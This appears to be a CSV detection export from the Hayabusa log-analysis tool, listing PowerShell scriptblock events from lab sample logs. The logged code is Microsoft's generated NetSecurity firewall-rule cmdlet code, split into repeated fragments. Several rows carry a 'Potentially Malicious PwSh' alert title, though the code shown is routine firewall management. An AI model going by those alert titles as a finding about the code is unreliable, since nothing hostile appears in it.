[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] 